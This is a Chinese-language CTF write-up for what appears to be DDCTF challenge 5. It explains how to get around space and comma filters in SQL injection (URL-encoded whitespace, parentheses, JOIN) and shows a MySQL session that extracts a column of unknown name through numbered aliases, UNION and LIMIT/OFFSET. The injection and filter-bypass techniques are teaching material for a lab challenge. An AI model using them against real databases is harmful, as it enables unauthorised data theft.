前言
本文介紹的是DDCTF第五題,繞過未知字段名的技巧,這里拿本機來操作了下,思路很棒也很清晰,分享給大家,下面來看看詳細的介紹:
實現思路
題目過濾空格和逗號,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括號都可以繞過,逗號使用join繞過;
存放flag的字段名未知,information_schema.columns也將表名的hex過濾了,即獲取不到字段名;這時可以利用聯合查詢,過程如下:
思想就是獲取flag,讓其在已知字段名下出現;
示例代碼:
| mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| a | b | c | d |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;+---+-------+----------+-------------+| 1 | 2 | 3 | 4 |+---+-------+----------+-------------+| 1 | 2 | 3 | 4 || 1 | admin | admin888 | 110@110.com || 2 | test | test123 | 119@119.com || 3 | cs | cs123 | 120@120.com |+---+-------+----------+-------------+4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;+-------------+| 4 |+-------------+| 4 || 110@110.com || 119@119.com || 120@120.com |+-------------+4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+| 4 |+-------------+| 120@120.com |+-------------+1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)dunion select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;+-------------+----------+----------+-------------+| id | username | password | email |+-------------+----------+----------+-------------+| 1 | admin | admin888 | 110@110.com || 120@120.com | 1 | 1 | 1 |+-------------+----------+----------+-------------+2 rows in set (0.04 sec) |
總結
以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對錯新站長站的支持。
新聞熱點
疑難解答
